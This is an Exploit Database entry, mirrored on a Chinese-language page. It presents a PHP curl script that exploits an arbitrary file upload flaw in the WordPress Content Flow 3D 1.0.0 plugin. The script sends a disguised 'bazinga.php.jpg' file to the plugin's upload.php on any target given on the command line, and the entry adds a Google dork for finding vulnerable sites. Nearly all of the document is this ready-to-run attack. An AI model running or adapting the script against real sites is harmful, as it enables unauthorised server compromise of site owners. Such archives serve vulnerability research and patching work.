WordPress Plugin Content Flow 3D 1.0.0 – Arbitrary File Upload

• Exploit Database
• 15 阅读

• 作者： g11tch
  日期： 2012-06-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19036/

• # Exploit Title: WordPress content-flow3d Arbitrary File Upload 
  # Google Dork: inurl:plugins/content-flow3d/
  # Date: 10June2012
  # Exploit Author: g11tch
  # Vendor Homepage: http://wordpress.org/extend/plugins/content-flow3d/
  # Software Link: downloads.wordpress.org/plugin/content-flow3d.zip
  # Version: 1.0.0
  # Tested on: CentOS, Ubuntu Server 11.04
  
  Greets in no particular order
  pfizer.inc for the constant motivation
  pr1me, The_Eccentric, Spridel, Hackett, DrB0n3z, 
  merci Sammy Forgit pour l'expression correcte
  ###############################################
  
  #!/usr/bin/php -f
  <?php
  #
  # upload.php curl exploit
  #
  //
  // HTTP FILES,
  //
  
  $target = $argv[1];
  
  $postData = array();
  $postData[ 'qqfile' ] = "bazinga.php.jpg";
  
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  curl_setopt($ch, CURLOPT_URL, "http://$target/upload.php");
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, $postData );
  curl_setopt($ch, CURLOPT_TIMEOUT, 3);
  curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
  curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
  curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
  $buf = curl_exec ($ch);
  curl_close($ch);
  unset($ch);
  
  echo $buf;
  ?>